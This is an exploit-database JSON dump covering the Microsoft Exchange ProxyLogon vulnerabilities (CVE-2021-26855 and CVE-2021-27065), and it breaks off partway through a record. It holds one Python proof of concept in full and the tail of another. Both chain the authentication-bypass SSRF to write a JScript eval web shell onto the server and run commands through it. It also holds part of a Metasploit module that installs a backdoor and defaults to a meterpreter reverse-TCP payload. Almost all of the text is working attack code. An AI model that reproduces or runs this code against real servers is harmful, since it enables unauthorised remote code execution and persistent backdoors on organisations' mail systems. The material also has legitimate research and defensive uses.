\"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"FilePathName\": shell_absolute_path}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=reset_oab_body, \nverify=False \n) \n \nif ct.status_code != 200: \nprint(\"\u5199\u5165shell\u5931\u8d25\u4e86\u554a\") \nexit() \n \nprint(\"\u6210\u529f\u4e86\u3002\u9a6c\u4e0a\u5c31\u9a8c\u8bc1shell\u662f\u5426OK!\") \nprint(\"POST shell:https://\"+target+\"/owa/auth/test11.aspx\") \nshell_url=\"https://\"+target+\"/owa/auth/test11.aspx\" \nprint('code=Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());') \nprint(\"\u6b63\u5728\u8bf7\u6c42shell\") \ndata=requests.post(shell_url,data={\"code\":\"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").exec(\\\"whoami\\\").StdOut.ReadAll());\"},verify=False) \nif data.status_code != 200: \nprint(\"\u5199\u5165shell\u5931\u8d25\") \nelse: \nprint(\"\u6743\u9650\u5982\u4e0b\uff1a\"+data.text.split(\"OAB (Default Web Site)\")[0].replace(\"Name : \",\"\")) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161846/msexchange2019-ssrfexec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-15T21:46:57", "description": "", "cvss3": {}, "published": "2021-03-11T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange Proxylogon SSRF Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-11T00:00:00", "id": "PACKETSTORM:161806", "href": "https://packetstormsecurity.com/files/161806/Microsoft-Exchange-Proxylogon-SSRF-Proof-Of-Concept.html", "sourceData": "`# Original Author: testanull https://github.com/testanull https://twitter.com/testanull \n# PoC of proxylogon chain SSRF(CVE-2021-26855) to write file \n# Original \"Archive\" https://web.archive.org/web/20210310164403/https://gist.github.com/testanull/fabd8eeb46f120c4b15f8793617ca7d1 \n \nimport requests \nfrom urllib3.exceptions import InsecureRequestWarning \nimport random \nimport string \nimport sys \n \n \ndef id_generator(size=6, chars=string.ascii_lowercase + string.digits): \nreturn ''.join(random.choice(chars) for _ in range(size)) \n \nif len(sys.argv) < 2: \nprint(\"Usage: python PoC.py <target> <email>\") \nprint(\"Example: python PoC.py mail.evil.corp haxor@evil.corp\") \nexit() \nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) \ntarget = sys.argv[1] \nemail = sys.argv[2] \nrandom_name = id_generator(3) + \".js\" \nuser_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\" \n \nshell_path = \"Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\ahihi.aspx\" \nshell_absolute_path = \"\\\\\\\\127.0.0.1\\\\c$\\\\%s\" % shell_path \n \nshell_content = '<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"exec_code\"],\"unsafe\");}</script>' \nlegacyDnPatchByte = \"68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a\" \nautoDiscoverBody = \"\"\"<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \n\"\"\" % email \n \nprint(\"Attacking target \" + target) \nprint(\"=============================\") \nprint(legacyDnPatchByte.decode('hex')) \nFQDN = \"EXCHANGE\" \nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\"Cookie\": \"X-BEResource=localhost~1942062522\", \n\"User-Agent\": user_agent}, \nverify=False) \nif \"X-CalculatedBETarget\" in ct.headers and \"X-FEServer\" in ct.headers: \nFQDN = ct.headers[\"X-FEServer\"] \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": user_agent}, \ndata=autoDiscoverBody, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"Autodiscover Error!\") \nexit() \nif \"<LegacyDN>\" not in ct.content: \nprint(\"Can not get LegacyDN!\") \nexit() \n \nlegacyDn = ct.content.split(\"<LegacyDN>\")[1].split(\"</LegacyDN>\")[0] \nprint(\"Got DN: \" + legacyDn) \n \nmapi_body = legacyDn + \"\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;\" % FQDN, \n\"Content-Type\": \"application/mapi-http\", \n\"User-Agent\": user_agent \n}, \ndata=mapi_body, \nverify=False \n) \nif ct.status_code != 200 or \"act as owner of a UserMailbox\" not in ct.content: \nprint(\"Mapi Error!\") \nexit() \n \nsid = ct.content.split(\"with SID \")[1].split(\" and MasterAccountSid\")[0] \n \nprint(\"Got SID: \" + sid) \n \nproxyLogon_request = \"\"\"<r at=\"Negotiate\" ln=\"john\"><s>%s</s><s a=\"7\" t=\"1\">S-1-1-0</s><s a=\"7\" t=\"1\">S-1-5-2</s><s a=\"7\" t=\"1\">S-1-5-11</s><s a=\"7\" t=\"1\">S-1-5-15</s><s a=\"3221225479\" t=\"1\">S-1-5-5-0-6948923</s></r> \n\"\"\" % sid \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/proxyLogon.ecp?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": user_agent \n}, \ndata=proxyLogon_request, \nverify=False \n) \nif ct.status_code != 241 or not \"set-cookie\" in ct.headers: \nprint(\"Proxylogon Error!\") \nexit() \n \nsess_id = ct.headers['set-cookie'].split(\"ASP.NET_SessionId=\")[1].split(\";\")[0] \n \nmsExchEcpCanary = ct.headers['set-cookie'].split(\"msExchEcpCanary=\")[1].split(\";\")[0] \nprint(\"Got session id: \" + sess_id) \nprint(\"Got canary: \" + msExchEcpCanary) \n \nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/about.aspx?a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, sess_id, msExchEcpCanary), \n\"User-Agent\": user_agent \n}, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"Wrong canary!\") \nprint(\"Sometime we can skip this ...\") \nrbacRole = ct.content.split(\"RBAC roles:</span> <span class='diagTxt'>\")[1].split(\"</span>\")[0] \n# print \"Got rbacRole: \"+ rbacRole \n \nprint(\"=========== It means good to go!!!====\") \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n \n}, \njson={\"filter\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"SelectedView\": \"\", \"SelectedVDirType\": \"All\"}}, \"sort\": {}}, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"GetOAB Error!\") \nexit() \noabId = ct.content.split('\"RawIdentity\":\"')[1].split('\"')[0] \nprint(\"Got OAB id: \" + oabId) \n \noab_json = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"ExternalUrl\": \"http://ffff/#%s\" % shell_content}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=oab_json, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"Set external url Error!\") \nexit() \n \nreset_oab_body = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"FilePathName\": shell_absolute_path}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=reset_oab_body, \nverify=False \n) \n \nif ct.status_code != 200: \nprint(\"Write Shell Error!\") \nexit() \n \nprint(\"Successful!\") \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161806/PoC_proxyLogon.py.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-08-17T10:43:41", "description": "This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the authentication, impersonating as the admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get the RCE (Remote Code Execution). By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). All components are vulnerable by default.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-12T23:49:45", "type": "metasploit", "title": "Microsoft Exchange ProxyLogon RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-11-10T00:12:38", "id": "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYLOGON_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxylogon_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyLogon RCE',\n 'Description' => %q{\n This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker bypassing the authentication, impersonating as the\n admin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012,\n Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009,\n Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010).\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Dicovery (Officially acknowledged by MSRC)\n 'Jang (@testanull)', # Vulnerability analysis + PoC (https://twitter.com/testanull)\n 'mekhalleh (RAMELLA S\u00e9bastien)', # Module author independent researcher (who listen to 'Le Comptoir Secu' and work at Zeop Entreprise)\n 'print(\"\")', # https://www.o2oxy.cn/3169.html\n 'lotusdll', # https://twitter.com/lotusdll/status/1371465073525362691\n 'Praetorian' # # Vulnerability analysis + PoC\n ],\n 'References' => [\n ['CVE', '2021-26855'],\n ['CVE', '2021-27065'],\n ['LOGO', 'https://proxylogon.com/images/logo.jpg'],\n ['URL', 'https://proxylogon.com/'],\n ['URL', 'http://aka.ms/exchangevulns'],\n ['URL', 'https://www.praetorian.com/blog/reproducing-proxylogon-exploit'],\n [\n 'URL',\n 'https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265'\n ],\n ['URL', 'https://www.o2oxy.cn/3169.html'],\n ['URL', 'https://github.com/praetorian-inc/proxylogon-exploit'],\n ['URL', 'https://github.com/Zeop-CyberSec/proxylogon_writeup']\n ],\n 'DisclosureDate' => '2021-03-02',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/exchange_proxylogon',\n 'HttpClientTimeout' => 60,\n 'RPORT' => 443,\n 'SSL' => true,\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Powershell',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_powershell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'Reliability' => [REPEATABLE_SESSION],\n 'AKA' => ['ProxyLogon']\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [true, 'A known email address for this organization']),\n OptEnum.new('METHOD', [true, 'HTTP Method to use for the check', 'POST', ['GET', 'POST']]),\n OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false])\n ])\n\n register_advanced_options([\n OptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']),\n OptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']),\n OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']),\n OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']),\n OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']),\n OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']),\n OptInt.new('MaxWaitLoop', [true, 'Max counter loop to wait for OAB Virtual Dir reset', 30]),\n OptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', Rex::UserAgent.session_agent])\n ])\n end\n\n def cmd_windows_generic?\n datastore['PAYLOAD'] == 'cmd/windows/generic'\n end\n\n def encode_cmd(cmd)\n cmd.gsub!('\\\\', '\\\\\\\\\\\\')\n cmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b')\n end\n\n def execute_command(cmd, _opts = {})\n if !cmd_windows_generic?\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\"\n else\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\"\n end\n\n send_request_raw(\n 'method' => 'POST',\n 'uri' => normalize_uri(web_directory, @random_filename),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'data' => \"#{@random_inputname}=#{cmd}\"\n )\n end\n\n def install_payload(exploit_info)\n # exploit_info: [server_name, sid, session, canary, oab_id]\n\n input_name = rand_text_alpha(4..8).to_s\n shell = \"http://o/#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{input_name}\\\"],\\\"unsafe\\\");}</script>\"\n data = {\n identity: {\n __type: 'Identity:ECP',\n DisplayName: (exploit_info[4][0]).to_s,\n RawIdentity: (exploit_info[4][1]).to_s\n },\n properties: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n ExternalUrl: shell.to_s\n }\n }\n }.to_json\n\n response = send_http(\n 'POST',\n \"[:[@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: exploit_info[2],\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(exploit_info[1]),\n 'msExchTargetMailbox' => patch_sid(exploit_info[1]),\n 'X-vDirObjectId' => (exploit_info[4][1]).to_s\n }\n )\n return '' if response.code != 200\n\n input_name\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def patch_sid(sid)\n ar = sid.to_s.split('-')\n if ar[-1] != '500'\n sid = \"#{ar[0..6].join('-')}-500\"\n end\n\n sid\n end\n\n def random_mapi_id\n id = \"{#{Rex::Text.rand_text_hex(8)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\"\n id.upcase\n end\n\n def random_ssrf_id\n # https://en.wikipedia.org/wiki/2,147,483,647 (lol)\n # max. 2147483647\n rand(1941962752..2147483647)\n end\n\n def request_autodiscover(server_name)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_http(\n 'POST',\n \"[:[@#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\",\n data: soap_autodiscover,\n ctype: 'text/xml; charset=utf-8'\n )\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty?\n\n server = ''\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty?\n\n [server, legacy_dn]\n end\n\n def request_fqdn\n ntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n received = send_request_raw(\n 'method' => 'RPC_IN_DATA',\n 'uri' => normalize_uri('rpc', 'rpcproxy.dll'),\n 'headers' => {\n 'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\"\n }\n )\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n if received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i)\n hash = received['WWW-Authenticate'].split('NTLM ')[1]\n message = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash))\n dns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME]\n\n return dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase\n end\n\n fail_with(Failure::NotFound, 'No Backend server was found')\n end\n\n # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff\n def request_mapi(server_name, legacy_dn, server_id)\n data = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n headers = {\n 'X-RequestType' => 'Connect',\n 'X-ClientInfo' => random_mapi_id,\n 'X-ClientApplication' => datastore['MapiClientApp'],\n 'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\"\n }\n\n sid = ''\n response = send_http(\n 'POST',\n \"[:[@#{server_name}:444/mapi/emsmdb?MailboxId=#{server_id}&a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'application/mapi-http',\n headers: headers\n )\n if response.code == 200\n sid_regex = /S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/\n\n sid = response.body.match(sid_regex).to_s\n end\n fail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty?\n\n sid\n end\n\n def request_oab(server_name, sid, session, canary)\n data = {\n filter: {\n Parameters: {\n __type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel',\n SelectedView: '',\n SelectedVDirType: 'OAB'\n }\n },\n sort: {}\n }.to_json\n\n response = send_http(\n 'POST',\n \"[:[@#{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=#{canary}&a=~#{random_ssrf_id}\",\n data: data,\n cookie: session,\n ctype: 'application/json; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n\n if response.code == 200\n data = JSON.parse(response.body)\n data['d']['Output'].each do |oab|\n if oab['Server'].downcase == server_name.split('.')[0].downcase\n return [oab['Identity']['DisplayName'], oab['Identity']['RawIdentity']]\n end\n end\n end\n\n []\n end\n\n def request_proxylogon(server_name, sid)\n data = \"<r at=\\\"Negotiate\\\" ln=\\\"#{datastore['EMAIL'].split('@')[0]}\\\"><s>#{sid}</s></r>\"\n session_id = ''\n canary = ''\n\n response = send_http(\n 'POST',\n \"[:[@#{server_name}:444/ecp/proxyLogon.ecp?a=~#{random_ssrf_id}\",\n data: data,\n ctype: 'text/xml; charset=utf-8',\n headers: {\n 'msExchLogonMailbox' => patch_sid(sid),\n 'msExchTargetMailbox' => patch_sid(sid)\n }\n )\n if response.code == 241\n session_id = response.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\n canary = response.get_cookies.scan(/msExchEcpCanary=([\\w\\-_.]+);*/).flatten[0] # coin coin coin ...\n end\n\n [session_id, canary]\n end\n\n # pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin.\n def run_cve_2021_26855\n if datastore['BackendServerName'] && !datastore['BackendServerName'].empty?\n server_name = datastore['BackendServerName']\n print_status(\"Internal server name forced to: #{server_name}\")\n else\n print_status(message('Retrieving backend FQDN over RPC request'))\n server_name = request_fqdn\n print_status(\"Internal server name (#{server_name})\")\n end\n\n # get informations by autodiscover request.\n print_status(message('Sending autodiscover request'))\n server_id, legacy_dn = request_autodiscover(server_name)\n\n print_status(\"Server: #{server_id}\")\n print_status(\"LegacyDN: #{legacy_dn}\")\n\n # get the user UID using mapi request.\n print_status(message('Sending mapi request'))\n sid = request_mapi(server_name, legacy_dn, server_id)\n print_status(\"SID: #{sid} (#{datastore['EMAIL']})\")\n\n # search oab\n sid, session, canary, oab_id = search_oab(server_name, sid)\n\n [server_name, sid, session, canary, oab_id]\n end\n\n # post-auth arbitrary file write.\n def run_cve_2021_27065(session_info)\n # set external url (and set the payload).\n print_status('Preparing the payload on the remote target')\n input_name = install_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t prepare the payload on the remote target') if input_name.empty?\n\n # reset the virtual directory (and write the payload).\n print_status('Writing the payload on the remote target')\n remote_file = write_payload(session_info)\n\n fail_with(Failure::NoAccess, 'Could\\'t write the payload on the remote target') if remote_file.empty?\n\n # wait a lot.\n i = 0\n while i < datastore['MaxWaitLoop']\n received = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(web_directory, remote_file)\n })\n if received && (received.code == 200)\n break\n end\n\n print_warning('Waiting for the payload to be available')\n sleep 5\n i += 1\n end\n fail_with(Failure::PayloadFailed, 'Could\\'t access the remote backdoor (see. ExchangePathBase option)') if received.code == 302\n\n [input_name, remote_file]\n end\n\n def search_oab(server_name, sid)\n # request cookies (session and canary)\n print_status(message('Sending ProxyLogon request'))\n\n print_status('Try to get a good msExchCanary (by patching user SID method)')\n session_id, canary = request_proxylogon(server_name, patch_sid(sid))\n if canary\n auth_session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, auth_session, canary)\n end\n\n if oab_id.nil? || oab_id.empty?\n print_status('Try to get a good msExchCanary (without correcting the user SID)')\n session_id, canary = request_proxylogon(server_name, sid)\n if canary\n auth_session = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\"\n oab_id = request_oab(server_name, sid, auth_session, canary)\n end\n end\n\n fail_with(Failure::NotFound, 'No \\'ASP.NET_SessionId\\' was found') if session_id.nil? || session_id.empty?\n fail_with(Failure::NotFound, 'No \\'msExchEcpCanary\\' was found') if canary.nil? || canary.empty?\n fail_with(Failure::NotFound, 'No \\'OAB Id\\' was found') if oab_id.nil? || oab_id.empty?\n\n print_status(\"ASP.NET_SessionId: #{session_id}\")\n print_status(\"msExchEcpCanary: #{canary}\")\n print_status(\"OAB id: #{oab_id[1]} (#{oab_id[0]})\")\n\n return [sid, auth_session, canary, oab_id]\n end\n\n def send_http(method, ssrf, opts = {})\n ssrf = \"X-BEResource=#{ssrf};\"\n if opts[:cookie] && !opts[:cookie].empty?\n opts[:cookie] = \"#{ssrf} #{opts[:cookie]}\"\n else\n opts[:cookie] = ssrf.to_s\n end\n\n opts[:ctype] = 'application/x-www-form-urlencoded' if opts[:ctype].nil?\n\n request = {\n 'method' => method,\n 'uri' => @random_uri,\n 'agent' => datastore['UserAgent'],\n 'ctype' => opts[:ctype]\n }\n request = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil?\n request = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil?\n request = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil?\n\n received = send_request_cgi(request)\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def soap_autodiscover\n <<~SOAP\n <?xml version=\"1.0\" 